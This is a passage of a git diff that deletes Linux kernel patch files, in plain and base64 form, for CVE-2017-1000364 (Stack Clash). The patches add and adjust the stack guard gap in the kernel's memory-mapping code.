bV9hcmVhX3N0cnVjdCAqdm1hKQoreworCXVuc2lnbmVkIGxvbmcgdm1fZW5kID0gdm1hLT52bV9lbmQ7CisKKwlpZiAodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApIHsKKwkJdm1fZW5kICs9IHN0YWNrX2d1YXJkX2dhcDsKKwkJaWYgKHZtX2VuZCA8IHZtYS0+dm1fZW5kKQorCQkJdm1fZW5kID0gLVBBR0VfU0laRTsKKwl9CisJcmV0dXJuIHZtX2VuZDsKK30KKwogc3RhdGljIGlubGluZSB1bnNpZ25lZCBsb25nIHZtYV9wYWdlcyhzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSkKIHsKIAlyZXR1cm4gKHZtYS0+dm1fZW5kIC0gdm1hLT52bV9zdGFydCkgPj4gUEFHRV9TSElGVDsKZGlmZiAtLWdpdCBhL21tL21lbW9yeS5jIGIvbW0vbWVtb3J5LmMKaW5kZXggNjBhN2RmYy4uZTcyMjc2MCAxMDA2NDQKLS0tIGEvbW0vbWVtb3J5LmMKKysrIGIvbW0vbWVtb3J5LmMKQEAgLTE2MTksMTIgKzE2MTksNiBAQAogCXJldHVybiBwYWdlOwogfQogCi1zdGF0aWMgaW5saW5lIGludCBzdGFja19ndWFyZF9wYWdlKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JcmV0dXJuIHN0YWNrX2d1YXJkX3BhZ2Vfc3RhcnQodm1hLCBhZGRyKSB8fAotCSAgICAgICBzdGFja19ndWFyZF9wYWdlX2VuZCh2bWEsIGFkZHIrUEFHRV9TSVpFKTsKLX0KLQogLyoqCiAgKiBfX2dldF91c2VyX3BhZ2VzKCkgLSBwaW4gdXNlciBwYWdlcyBpbiBtZW1vcnkKICAqIEB0c2s6CXRhc2tfc3RydWN0IG9mIHRhcmdldCB0YXNrCkBAIC0xNzc1LDExICsxNzY5LDYgQEAKIAkJCQlpbnQgcmV0OwogCQkJCXVuc2lnbmVkIGludCBmYXVsdF9mbGFncyA9IDA7CiAKLQkJCQkvKiBGb3IgbWxvY2ssIGp1c3Qgc2tpcCB0aGUgc3RhY2sgZ3VhcmQgcGFnZS4gKi8KLQkJCQlpZiAoZm9sbF9mbGFncyAmIEZPTExfTUxPQ0spIHsKLQkJCQkJaWYgKHN0YWNrX2d1YXJkX3BhZ2Uodm1hLCBzdGFydCkpCi0JCQkJCQlnb3RvIG5leHRfcGFnZTsKLQkJCQl9CiAJCQkJaWYgKGZvbGxfZmxhZ3MgJiBGT0xMX1dSSVRFKQogCQkJCQlmYXVsdF9mbGFncyB8PSBGQVVMVF9GTEFHX1dSSVRFOwogCQkJCWlmIChub25ibG9ja2luZykKQEAgLTMwODcsNDAgKzMwNzYsNiBAQAogfQogCiAvKgotICogVGhpcyBpcyBsaWtlIGEgc3BlY2lhbCBzaW5nbGUtcGFnZSAiZXhwYW5kX3tkb3dufHVwfXdhcmRzKCkiLAotICogZXhjZXB0IHdlIG11c3QgZmlyc3QgbWFrZSBzdXJlIHRoYXQgJ2FkZHJlc3N7LXwrfVBBR0VfU0laRScKLSAqIGRvZXNuJ3QgaGl0IGFub3RoZXIgdm1hLgotICovCi1zdGF0aWMgaW5saW5lIGludCBjaGVja19zdGFja19ndWFyZF9wYWdlKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHJlc3MpCi17Ci0JYWRkcmVzcyAmPSBQQUdFX01BU0s7Ci0JaWYgKCh2bWEtPnZtX2ZsYWdzICYgVk1fR1JPV1NET1dOKSAmJiBhZGRyZXNzID09IHZtYS0+dm1fc3RhcnQpIHsKLQkJc3RydWN0IHZtX2FyZWFfc3RydWN0ICpwcmV2ID0gdm1hLT52bV9wcmV2OwotCi0JCS8qCi0JCSAqIElzIHRoZXJlIGEgbWFwcGluZyBhYnV0dGluZyB0aGlzIG9uZSBiZWxvdz8KLQkJICoKLQkJICogVGhhdCdzIG9ubHkgb2sgaWYgaXQncyB0aGUgc2FtZSBzdGFjayBtYXBwaW5nCi0JCSAqIHRoYXQgaGFzIGdvdHRlbiBzcGxpdC4uCi0JCSAqLwotCQlpZiAocHJldiAmJiBwcmV2LT52bV9lbmQgPT0gYWRkcmVzcykKLQkJCXJldHVybiBwcmV2LT52bV9mbGFncyAmIFZNX0dST1dTRE9XTiA/IDAgOiAtRU5PTUVNOwotCi0JCWV4cGFuZF9kb3dud2FyZHModm1hLCBhZGRyZXNzIC0gUEFHRV9TSVpFKTsKLQl9Ci0JaWYgKCh2bWEtPnZtX2ZsYWdzICYgVk1fR1JPV1NVUCkgJiYgYWRkcmVzcyArIFBBR0VfU0laRSA9PSB2bWEtPnZtX2VuZCkgewotCQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKm5leHQgPSB2bWEtPnZtX25leHQ7Ci0KLQkJLyogQXMgVk1fR1JPV1NET1dOIGJ1dCBzL2JlbG93L2Fib3ZlLyAqLwotCQlpZiAobmV4dCAmJiBuZXh0LT52bV9zdGFydCA9PSBhZGRyZXNzICsgUEFHRV9TSVpFKQotCQkJcmV0dXJuIG5leHQtPnZtX2ZsYWdzICYgVk1fR1JPV1NVUCA/IDAgOiAtRU5PTUVNOwotCi0JCWV4cGFuZF91cHdhcmRzKHZtYSwgYWRkcmVzcyArIFBBR0VfU0laRSk7Ci0JfQotCXJldHVybiAwOwotfQotCi0vKgogICogV2UgZW50ZXIgd2l0aCBub24tZXhjbHVzaXZlIG1tYXBfc2VtICh0byBleGNsdWRlIHZtYSBjaGFuZ2VzLAogICogYnV0IGFsbG93IGNvbmN1cnJlbnQgZmF1bHRzKSwgYW5kIHB0ZSBtYXBwZWQgYnV0IG5vdCB5ZXQgbG9ja2VkLgogICogV2UgcmV0dXJuIHdpdGggbW1hcF9zZW0gc3RpbGwgaGVsZCwgYnV0IHB0ZSB1bm1hcHBlZCBhbmQgdW5sb2NrZWQuCkBAIC0zMTM3LDEwICszMDkyLDYgQEAKIAogCS8qIEZpbGUgbWFwcGluZyB3aXRob3V0IC0+dm1fb3BzID8gKi8KIAlpZiAodm1hLT52bV9mbGFncyAmIFZNX1NIQVJFRCkKLQkJcmV0dXJuIFZNX0ZBVUxUX1NJR0JVUzsKLQotCS8qIENoZWNrIGlmIHdlIG5lZWQgdG8gYWRkIGEgZ3VhcmQgcGFnZSB0byB0aGUgc3RhY2sgKi8KLQlpZiAoY2hlY2tfc3RhY2tfZ3VhcmRfcGFnZSh2bWEsIGFkZHJlc3MpIDwgMCkKIAkJcmV0dXJuIFZNX0ZBVUxUX1NJR0JVUzsKIAogCS8qIFVzZSB0aGUgemVyby1wYWdlIGZvciByZWFkcyAqLwpkaWZmIC0tZ2l0IGEvbW0vbW1hcC5jIGIvbW0vbW1hcC5jCmluZGV4IGU0OTVhODQuLmI5NGE5ODIgMTAwNjQ0Ci0tLSBhL21tL21tYXAuYworKysgYi9tbS9tbWFwLmMKQEAgLTI1OSw2ICsyNTksNyBAQAogCXVuc2lnbmVkIGxvbmcgcmxpbSwgcmV0dmFsOwogCXVuc2lnbmVkIGxvbmcgbmV3YnJrLCBvbGRicms7CiAJc3RydWN0IG1tX3N0cnVjdCAqbW0gPSBjdXJyZW50LT5tbTsKKwlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKm5leHQ7CiAJdW5zaWduZWQgbG9uZyBtaW5fYnJrOwogCiAJZG93bl93cml0ZSgmbW0tPm1tYXBfc2VtKTsKQEAgLTMwMyw3ICszMDQsOCBAQAogCX0KIAogCS8qIENoZWNrIGFnYWluc3QgZXhpc3RpbmcgbW1hcCBtYXBwaW5ncy4gKi8KLQlpZiAoZmluZF92bWFfaW50ZXJzZWN0aW9uKG1tLCBvbGRicmssIG5ld2JyaytQQUdFX1NJWkUpKQorCW5leHQgPSBmaW5kX3ZtYShtbSwgb2xkYnJrKTsKKwlpZiAobmV4dCAmJiBuZXdicmsgKyBQQUdFX1NJWkUgPiB2bV9zdGFydF9nYXAobmV4dCkpCiAJCWdvdG8gb3V0OwogCiAJLyogT2ssIGxvb2tzIGdvb2QgLSBsZXQgaXQgcmlwLiAqLwpAQCAtMTQyNiw4ICsxNDI4LDggQEAKIAkJdW5zaWduZWQgbG9uZyBsZW4sIHVuc2lnbmVkIGxvbmcgcGdvZmYsIHVuc2lnbmVkIGxvbmcgZmxhZ3MpCiB7CiAJc3RydWN0IG1tX3N0cnVjdCAqbW0gPSBjdXJyZW50LT5tbTsKLQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYTsKLQl1bnNpZ25lZCBsb25nIHN0YXJ0X2FkZHI7CisJc3RydWN0IHZtX2FyZWFfc3RydWN0ICp2bWEsICpwcmV2OworCXVuc2lnbmVkIGxvbmcgc3RhcnRfYWRkciwgdm1fc3RhcnQsIHByZXZfZW5kOwogCiAJaWYgKGxlbiA+IFRBU0tfU0laRSkKIAkJcmV0dXJuIC1FTk9NRU07CkBAIC0xNDM3LDkgKzE0MzksMTAgQEAKIAogCWlmIChhZGRyKSB7CiAJCWFkZHIgPSBQQUdFX0FMSUdOKGFkZHIpOwotCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CisJCXZtYSA9IGZpbmRfdm1hX3ByZXYobW0sIGFkZHIsICZwcmV2KTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkgJiYKKwkJICAgICghcHJldiB8fCBhZGRyID49IHZtX2VuZF9nYXAocHJldikpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCWlmIChsZW4gPiBtbS0+Y2FjaGVkX2hvbGVfc2l6ZSkgewpAQCAtMTQ1MCw3ICsxNDUzLDE3IEBACiAJfQogCiBmdWxsX3NlYXJjaDoKLQlmb3IgKHZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsgOyB2bWEgPSB2bWEtPnZtX25leHQpIHsKKwlmb3IgKHZtYSA9IGZpbmRfdm1hX3ByZXYobW0sIGFkZHIsICZwcmV2KTsgOyBwcmV2ID0gdm1hLAorCQkJCQkJdm1hID0gdm1hLT52bV9uZXh0KSB7CisJCWlmIChwcmV2KSB7CisJCQlwcmV2X2VuZCA9IHZtX2VuZF9nYXAocHJldik7CisJCQlpZiAoYWRkciA8IHByZXZfZW5kKSB7CisJCQkJYWRkciA9IHByZXZfZW5kOworCQkJCS8qIElmIHZtYSBhbHJlYWR5IHZpb2xhdGVzIGdhcCwgZm9yZ2V0IGl0ICovCisJCQkJaWYgKHZtYSAmJiBhZGRyID4gdm1hLT52bV9zdGFydCkKKwkJCQkJYWRkciA9IHZtYS0+dm1fc3RhcnQ7CisJCQl9CisJCX0KIAkJLyogQXQgdGhpcyBwb2ludDogICghdm1hIHx8IGFkZHIgPCB2bWEtPnZtX2VuZCkuICovCiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPCBhZGRyKSB7CiAJCQkvKgpAQCAtMTQ2NSwxNiArMTQ3OCwxNiBAQAogCQkJfQogCQkJcmV0dXJuIC1FTk9NRU07CiAJCX0KLQkJaWYgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSB7CisJCXZtX3N0YXJ0ID0gdm1hID8gdm1fc3RhcnRfZ2FwKHZtYSkgOiBUQVNLX1NJWkU7CisJCWlmIChhZGRyICsgbGVuIDw9IHZtX3N0YXJ0KSB7CiAJCQkvKgogCQkJICogUmVtZW1iZXIgdGhlIHBsYWNlIHdoZXJlIHdlIHN0b3BwZWQgdGhlIHNlYXJjaDoKIAkJCSAqLwogCQkJbW0tPmZyZWVfYXJlYV9jYWNoZSA9IGFkZHIgKyBsZW47CiAJCQlyZXR1cm4gYWRkcjsKIAkJfQotCQlpZiAoYWRkciArIG1tLT5jYWNoZWRfaG9sZV9zaXplIDwgdm1hLT52bV9zdGFydCkKLQkJICAgICAgICBtbS0+Y2FjaGVkX2hvbGVfc2l6ZSA9IHZtYS0+dm1fc3RhcnQgLSBhZGRyOwotCQlhZGRyID0gdm1hLT52bV9lbmQ7CisJCWlmIChhZGRyICsgbW0tPmNhY2hlZF9ob2xlX3NpemUgPCB2bV9zdGFydCkKKwkJCW1tLT5jYWNoZWRfaG9sZV9zaXplID0gdm1fc3RhcnQgLSBhZGRyOwogCX0KIH0KICNlbmRpZgkKQEAgLTE0OTgsOSArMTUxMSwxMCBAQAogCQkJICBjb25zdCB1bnNpZ25lZCBsb25nIGxlbiwgY29uc3QgdW5zaWduZWQgbG9uZyBwZ29mZiwKIAkJCSAgY29uc3QgdW5zaWduZWQgbG9uZyBmbGFncykKIHsKLQlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYTsKKwlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSwgKnByZXY7CiAJc3RydWN0IG1tX3N0cnVjdCAqbW0gPSBjdXJyZW50LT5tbTsKIAl1bnNpZ25lZCBsb25nIGFkZHIgPSBhZGRyMCwgc3RhcnRfYWRkcjsKKwl1bnNpZ25lZCBsb25nIHZtX3N0YXJ0LCBwcmV2X2VuZDsKIAogCS8qIHJlcXVlc3RlZCBsZW5ndGggdG9vIGJpZyBmb3IgZW50aXJlIGFkZHJlc3Mgc3BhY2UgKi8KIAlpZiAobGVuID4gVEFTS19TSVpFKQpAQCAtMTUxMiw5ICsxNTI2LDEwIEBACiAJLyogcmVxdWVzdGluZyBhIHNwZWNpZmljIGFkZHJlc3MgKi8KIAlpZiAoYWRkcikgewogCQlhZGRyID0gUEFHRV9BTElHTihhZGRyKTsKLQkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOworCQl2bWEgPSBmaW5kX3ZtYV9wcmV2KG1tLCBhZGRyLCAmcHJldik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkJCSghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCQkJKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkgJiYKKwkJCQkoIXByZXYgfHwgYWRkciA+PSB2bV9lbmRfZ2FwKHByZXYpKSkKIAkJCXJldHVybiBhZGRyOwogCX0KIApAQCAtMTUzOCwxOCArMTU1MywyMSBAQAogCQkgKiBlbHNlIGlmIG5ldyByZWdpb24gZml0cyBiZWxvdyB2bWEtPnZtX3N0YXJ0LAogCQkgKiByZXR1cm4gd2l0aCBzdWNjZXNzOgogCQkgKi8KLQkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOwotCQlpZiAoIXZtYSB8fCBhZGRyK2xlbiA8PSB2bWEtPnZtX3N0YXJ0KQorCQl2bWEgPSBmaW5kX3ZtYV9wcmV2KG1tLCBhZGRyLCAmcHJldik7CisJCXZtX3N0YXJ0ID0gdm1hID8gdm1fc3RhcnRfZ2FwKHZtYSkgOiBtbS0+bW1hcF9iYXNlOworCQlwcmV2X2VuZCA9IHZtX2VuZF9nYXAocHJldik7CisKKwkJaWYgKGFkZHIgKyBsZW4gPD0gdm1fc3RhcnQgJiYgYWRkciA+PSBwcmV2X2VuZCkKIAkJCS8qIHJlbWVtYmVyIHRoZSBhZGRyZXNzIGFzIGEgaGludCBmb3IgbmV4dCB0aW1lICovCiAJCQlyZXR1cm4gKG1tLT5mcmVlX2FyZWFfY2FjaGUgPSBhZGRyKTsKIAogIAkJLyogcmVtZW1iZXIgdGhlIGxhcmdlc3QgaG9sZSB3ZSBzYXcgc28gZmFyICovCi0gCQlpZiAoYWRkciArIG1tLT5jYWNoZWRfaG9sZV9zaXplIDwgdm1hLT52bV9zdGFydCkKLSAJCSAgICAgICAgbW0tPmNhY2hlZF9ob2xlX3NpemUgPSB2bWEtPnZtX3N0YXJ0IC0gYWRkcjsKLQorCQlpZiAoYWRkciArIG1tLT5jYWNoZWRfaG9sZV9zaXplIDwgdm1fc3RhcnQpCisJCQltbS0+Y2FjaGVkX2hvbGVfc2l6ZSA9IHZtX3N0YXJ0IC0gYWRkcjsKKyAKIAkJLyogdHJ5IGp1c3QgYmVsb3cgdGhlIGN1cnJlbnQgdm1hLT52bV9zdGFydCAqLwotCQlhZGRyID0gdm1hLT52bV9zdGFydC1sZW47Ci0JfSB3aGlsZSAobGVuIDwgdm1hLT52bV9zdGFydCk7CisJCWFkZHIgPSB2bV9zdGFydCAtIGxlbjsKKwl9IHdoaWxlIChsZW4gPCB2bV9zdGFydCk7CiAKIGZhaWw6CiAJLyoKQEAgLTE3NDksNyArMTc2Nyw5IEBACiAgKi8KIGludCBleHBhbmRfdXB3YXJkcyhzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSwgdW5zaWduZWQgbG9uZyBhZGRyZXNzKQogewotCWludCBlcnJvcjsKKwlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKm5leHQ7CisJdW5zaWduZWQgbG9uZyBnYXBfYWRkcjsKKwlpbnQgZXJyb3IgPSAwOwogCiAJaWYgKCEodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApKQogCQlyZXR1cm4gLUVGQVVMVDsKQEAgLTE3NTgsMjMgKzE3NzgsMzMgQEAKIAkgKiBXZSBtdXN0IG1ha2Ugc3VyZSB0aGUgYW5vbl92bWEgaXMgYWxsb2NhdGVkCiAJICogc28gdGhhdCB0aGUgYW5vbl92bWEgbG9ja2luZyBpcyBub3QgYSBub29wLgogCSAqLworCS8qIEd1YXJkIGFnYWluc3Qgd3JhcHBpbmcgYXJvdW5kIHRvIGFkZHJlc3MgMC4gKi8KKwlhZGRyZXNzICY9IFBBR0VfTUFTSzsKKwlhZGRyZXNzICs9IFBBR0VfU0laRTsKKwlpZiAoIWFkZHJlc3MpCisJCXJldHVybiAtRU5PTUVNOworCisJLyogRW5mb3JjZSBzdGFja19ndWFyZF9nYXAgKi8KKwlnYXBfYWRkciA9IGFkZHJlc3MgKyBzdGFja19ndWFyZF9nYXA7CisJaWYgKGdhcF9hZGRyIDwgYWRkcmVzcykKKwkJcmV0dXJuIC1FTk9NRU07CisJbmV4dCA9IHZtYS0+dm1fbmV4dDsKKwlpZiAobmV4dCAmJiBuZXh0LT52bV9zdGFydCA8IGdhcF9hZGRyKSB7CisJCWlmICghKG5leHQtPnZtX2ZsYWdzICYgVk1fR1JPV1NVUCkpCisJCQlyZXR1cm4gLUVOT01FTTsKKwkJLyogQ2hlY2sgdGhhdCBib3RoIHN0YWNrIHNlZ21lbnRzIGhhdmUgdGhlIHNhbWUgYW5vbl92bWE/ICovCisJfQorCisJLyogV2UgbXVzdCBtYWtlIHN1cmUgdGhlIGFub25fdm1hIGlzIGFsbG9jYXRlZC4gKi8KIAlpZiAodW5saWtlbHkoYW5vbl92bWFfcHJlcGFyZSh2bWEpKSkKIAkJcmV0dXJuIC1FTk9NRU07Ci0Jdm1hX2xvY2tfYW5vbl92bWEodm1hKTsKIAogCS8qCiAJICogdm1hLT52bV9zdGFydC92bV9lbmQgY2Fubm90IGNoYW5nZSB1bmRlciB1cyBiZWNhdXNlIHRoZSBjYWxsZXIKIAkgKiBpcyByZXF1aXJlZCB0byBob2xkIHRoZSBtbWFwX3NlbSBpbiByZWFkIG1vZGUuICBXZSBuZWVkIHRoZQogCSAqIGFub25fdm1hIGxvY2sgdG8gc2VyaWFsaXplIGFnYWluc3QgY29uY3VycmVudCBleHBhbmRfc3RhY2tzLgotCSAqIEFsc28gZ3VhcmQgYWdhaW5zdCB3cmFwcGluZyBhcm91bmQgdG8gYWRkcmVzcyAwLgogCSAqLwotCWlmIChhZGRyZXNzIDwgUEFHRV9BTElHTihhZGRyZXNzKzQpKQotCQlhZGRyZXNzID0gUEFHRV9BTElHTihhZGRyZXNzKzQpOwotCWVsc2UgewotCQl2bWFfdW5sb2NrX2Fub25fdm1hKHZtYSk7Ci0JCXJldHVybiAtRU5PTUVNOwotCX0KLQllcnJvciA9IDA7CisJdm1hX2xvY2tfYW5vbl92bWEodm1hKTsKIAogCS8qIFNvbWVib2R5IGVsc2UgbWlnaHQgaGF2ZSByYWNlZCBhbmQgZXhwYW5kZWQgaXQgYWxyZWFkeSAqLwogCWlmIChhZGRyZXNzID4gdm1hLT52bV9lbmQpIHsKQEAgLTE4MDQsMjcgKzE4MzQsMzYgQEAKIGludCBleHBhbmRfZG93bndhcmRzKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLAogCQkJCSAgIHVuc2lnbmVkIGxvbmcgYWRkcmVzcykKIHsKKwlzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnByZXY7CisJdW5zaWduZWQgbG9uZyBnYXBfYWRkcjsKIAlpbnQgZXJyb3I7Ci0KLQkvKgotCSAqIFdlIG11c3QgbWFrZSBzdXJlIHRoZSBhbm9uX3ZtYSBpcyBhbGxvY2F0ZWQKLQkgKiBzbyB0aGF0IHRoZSBhbm9uX3ZtYSBsb2NraW5nIGlzIG5vdCBhIG5vb3AuCi0JICovCi0JaWYgKHVubGlrZWx5KGFub25fdm1hX3ByZXBhcmUodm1hKSkpCi0JCXJldHVybiAtRU5PTUVNOwogCiAJYWRkcmVzcyAmPSBQQUdFX01BU0s7CiAJZXJyb3IgPSBzZWN1cml0eV9maWxlX21tYXAoTlVMTCwgMCwgMCwgMCwgYWRkcmVzcywgMSk7CiAJaWYgKGVycm9yKQogCQlyZXR1cm4gZXJyb3I7CiAKLQl2bWFfbG9ja19hbm9uX3ZtYSh2bWEpOworCS8qIEVuZm9yY2Ugc3RhY2tfZ3VhcmRfZ2FwICovCisJZ2FwX2FkZHIgPSBhZGRyZXNzIC0gc3RhY2tfZ3VhcmRfZ2FwOworCWlmIChnYXBfYWRkciA+IGFkZHJlc3MpCisJCXJldHVybiAtRU5PTUVNOworCXByZXYgPSB2bWEtPnZtX3ByZXY7CisJaWYgKHByZXYgJiYgcHJldi0+dm1fZW5kID4gZ2FwX2FkZHIpIHsKKwkJaWYgKCEocHJldi0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pKQorCQkJcmV0dXJuIC1FTk9NRU07CisJCS8qIENoZWNrIHRoYXQgYm90aCBzdGFjayBzZWdtZW50cyBoYXZlIHRoZSBzYW1lIGFub25fdm1hPyAqLworCX0KKworCS8qIFdlIG11c3QgbWFrZSBzdXJlIHRoZSBhbm9uX3ZtYSBpcyBhbGxvY2F0ZWQuICovCisJaWYgKHVubGlrZWx5KGFub25fdm1hX3ByZXBhcmUodm1hKSkpCisJCXJldHVybiAtRU5PTUVNOwogCiAJLyoKIAkgKiB2bWEtPnZtX3N0YXJ0L3ZtX2VuZCBjYW5ub3QgY2hhbmdlIHVuZGVyIHVzIGJlY2F1c2UgdGhlIGNhbGxlcgogCSAqIGlzIHJlcXVpcmVkIHRvIGhvbGQgdGhlIG1tYXBfc2VtIGluIHJlYWQgbW9kZS4gIFdlIG5lZWQgdGhlCiAJICogYW5vbl92bWEgbG9jayB0byBzZXJpYWxpemUgYWdhaW5zdCBjb25jdXJyZW50IGV4cGFuZF9zdGFja3MuCiAJICovCisJdm1hX2xvY2tfYW5vbl92bWEodm1hKTsKIAogCS8qIFNvbWVib2R5IGVsc2UgbWlnaHQgaGF2ZSByYWNlZCBhbmQgZXhwYW5kZWQgaXQgYWxyZWFkeSAqLwogCWlmIChhZGRyZXNzIDwgdm1hLT52bV9zdGFydCkgewpAQCAtMTg0OCw2ICsxODg3LDIzIEBACiAJcmV0dXJuIGVycm9yOwogfQogCisvKiBlbmZvcmNlZCBnYXAgYmV0d2VlbiB0aGUgZXhwYW5kaW5nIHN0YWNrIGFuZCBvdGhlciBtYXBwaW5ncy4gKi8KK3Vuc2lnbmVkIGxvbmcgc3RhY2tfZ3VhcmRfZ2FwID0gMjU2VUw8PFBBR0VfU0hJRlQ7CisKK3N0YXRpYyBpbnQgX19pbml0IGNtZGxpbmVfcGFyc2Vfc3RhY2tfZ3VhcmRfZ2FwKGNoYXIgKnApCit7CisJdW5zaWduZWQgbG9uZyB2YWw7CisJY2hhciAqZW5kcHRyOworCisJdmFsID0gc2ltcGxlX3N0cnRvdWwocCwgJmVuZHB0ciwgMTApOworCWlmICghKmVuZHB0cikKKwkJc3RhY2tfZ3VhcmRfZ2FwID0gdmFsIDw8IFBBR0VfU0hJRlQ7CisKKwlyZXR1cm4gMDsKK30KK19fc2V0dXAoInN0YWNrX2d1YXJkX2dhcD0iLCBjbWRsaW5lX3BhcnNlX3N0YWNrX2d1YXJkX2dhcCk7CisKKwogI2lmZGVmIENPTkZJR19TVEFDS19HUk9XU1VQCiBpbnQgZXhwYW5kX3N0YWNrKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHJlc3MpCiB7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0004.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0004.patch
deleted file mode 100644
index 13386e76..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0004.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 631cf8061fa5fccd307e30abc4c778a553fc2006 Mon Sep 17 00:00:00 2001
-From: Helge Deller <deller@gmx.de>
-Date: Mon, 19 Jun 2017 17:34:05 +0200
-Subject: [PATCH] Allow stack to grow up to address space limit
-
-commit bd726c90b6b8ce87602208701b208a208e6d5600 upstream.
-
-Fix expand_upwards() on architectures with an upward-growing stack (parisc,
-metag and partly IA-64) to allow the stack to reliably grow exactly up to
-the address space limit given by TASK_SIZE.
-
-Change-Id: I5a480cdafc4fc2728b7a5dbe48155eaf8796f46e
-Signed-off-by: Helge Deller <deller@gmx.de>
-Acked-by: Hugh Dickins <hughd@google.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index b94a982..364a83f 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -1778,16 +1778,19 @@
- 	 * We must make sure the anon_vma is allocated
- 	 * so that the anon_vma locking is not a noop.
- 	 */
--	/* Guard against wrapping around to address 0. */
-+	/* Guard against exceeding limits of the address space. */
- 	address &= PAGE_MASK;
--	address += PAGE_SIZE;
--	if (!address)
-+	if (address >= TASK_SIZE)
- 		return -ENOMEM;
-+	address += PAGE_SIZE;
- 
- 	/* Enforce stack_guard_gap */
- 	gap_addr = address + stack_guard_gap;
--	if (gap_addr < address)
--		return -ENOMEM;
-+
-+	/* Guard against overflow */
-+	if (gap_addr < address || gap_addr > TASK_SIZE)
-+		gap_addr = TASK_SIZE;
-+
- 	next = vma->vm_next;
- 	if (next && next->vm_start < gap_addr) {
- 		if (!(next->vm_flags & VM_GROWSUP))
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0004.patch.base64
deleted file mode 100644
index 5bf1f5ba..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA2MzFjZjgwNjFmYTVmY2NkMzA3ZTMwYWJjNGM3NzhhNTUzZmMyMDA2IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBIZWxnZSBEZWxsZXIgPGRlbGxlckBnbXguZGU+CkRhdGU6IE1vbiwgMTkgSnVuIDIwMTcgMTc6MzQ6MDUgKzAyMDAKU3ViamVjdDogW1BBVENIXSBBbGxvdyBzdGFjayB0byBncm93IHVwIHRvIGFkZHJlc3Mgc3BhY2UgbGltaXQKCmNvbW1pdCBiZDcyNmM5MGI2YjhjZTg3NjAyMjA4NzAxYjIwOGEyMDhlNmQ1NjAwIHVwc3RyZWFtLgoKRml4IGV4cGFuZF91cHdhcmRzKCkgb24gYXJjaGl0ZWN0dXJlcyB3aXRoIGFuIHVwd2FyZC1ncm93aW5nIHN0YWNrIChwYXJpc2MsCm1ldGFnIGFuZCBwYXJ0bHkgSUEtNjQpIHRvIGFsbG93IHRoZSBzdGFjayB0byByZWxpYWJseSBncm93IGV4YWN0bHkgdXAgdG8KdGhlIGFkZHJlc3Mgc3BhY2UgbGltaXQgZ2l2ZW4gYnkgVEFTS19TSVpFLgoKQ2hhbmdlLUlkOiBJNWE0ODBjZGFmYzRmYzI3MjhiN2E1ZGJlNDgxNTVlYWY4Nzk2ZjQ2ZQpTaWduZWQtb2ZmLWJ5OiBIZWxnZSBEZWxsZXIgPGRlbGxlckBnbXguZGU+CkFja2VkLWJ5OiBIdWdoIERpY2tpbnMgPGh1Z2hkQGdvb2dsZS5jb20+ClNpZ25lZC1vZmYtYnk6IExpbnVzIFRvcnZhbGRzIDx0b3J2YWxkc0BsaW51eC1mb3VuZGF0aW9uLm9yZz4KU2lnbmVkLW9mZi1ieTogV2lsbHkgVGFycmVhdSA8d0Axd3QuZXU+Ci0tLQoKZGlmZiAtLWdpdCBhL21tL21tYXAuYyBiL21tL21tYXAuYwppbmRleCBiOTRhOTgyLi4zNjRhODNmIDEwMDY0NAotLS0gYS9tbS9tbWFwLmMKKysrIGIvbW0vbW1hcC5jCkBAIC0xNzc4LDE2ICsxNzc4LDE5IEBACiAJICogV2UgbXVzdCBtYWtlIHN1cmUgdGhlIGFub25fdm1hIGlzIGFsbG9jYXRlZAogCSAqIHNvIHRoYXQgdGhl